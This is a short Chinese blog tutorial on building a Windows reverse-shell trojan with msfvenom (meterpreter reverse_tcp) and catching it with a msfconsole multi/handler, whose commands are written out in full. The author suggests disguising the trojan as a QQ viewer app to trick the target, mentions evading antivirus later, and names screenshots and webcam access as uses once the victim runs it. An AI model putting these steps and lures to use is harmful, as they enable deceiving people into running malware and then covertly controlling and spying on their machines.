msfvenom的简单使⽤
下⾯简单的演⽰⼀下msfvenom的简单使⽤,
攻击者:kali Linux ip:192.168.187.130
靶机:Windows10
思路:利⽤msfvenom制作 .exe ⽂件,然后发送到靶机Windows上⾯,运⾏后就可以在kali linux 上⾯利⽤msfconsole连接msfvenom服务
控制靶机
1. 在kali Linux 上⾯启动⼀个终端 执⾏以下命令
msfvenom -l | grep windows | grep x64 | grep tcp
列出所有可以⽤的并在屏幕显⽰条⽬中有 Windows x64 tcp 的
payload在这⾥我们选择windows/x64/meterpreter/reverse_tcp
下⾯是使⽤msfvenom的部分参数,是⽐较常⽤的
-p 选择⼀个payload
-l 载荷列表
-f ⽣成的⽂件格式
-e 编码⽅式
-i 编码次数
-b 在⽣成的程序中避免出现的值
-x 允许我们指定⼀个⾃定义的可执⾏⽂件作为模板,也就是将⽊马捆绑到这个可执⾏⽂件上。
-h 帮助
在这⾥,我们⽣成⼀个的⽊马⽂件(⽂件在root⽂件夹下),控制端的ip为192.168.187.130,端⼝号为4444。然后利⽤这个⽊马传给
靶机,可以改⼀改名字,⽐如 QQ坦⽩说查看器之类的,杀毒软件可能报毒,其实是需要免杀处理的,后⾯学了再说吧。
2. 利⽤msfconsole监听
启动msfconsole 漫长的等待..................................................
然后报错了,
然后查了⼀下,分配的内存不够
这样解决有点慢,我有⼀个更暴⼒的,既然内存不⾜,我就把虚拟机分配给kali Linux的内存加到2G,OK问题解决
键⼊以下命令:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.187.130
set lport 4444
exploit
然后就可以等待了,当靶机点击了那个⽂件时
就可以开始你的表演了,⽐如截图,打开摄像头等等
本文发布于:2023-05-23 14:33:40,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/falv/fa/78/100590.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
留言与评论(共有 0 条评论) |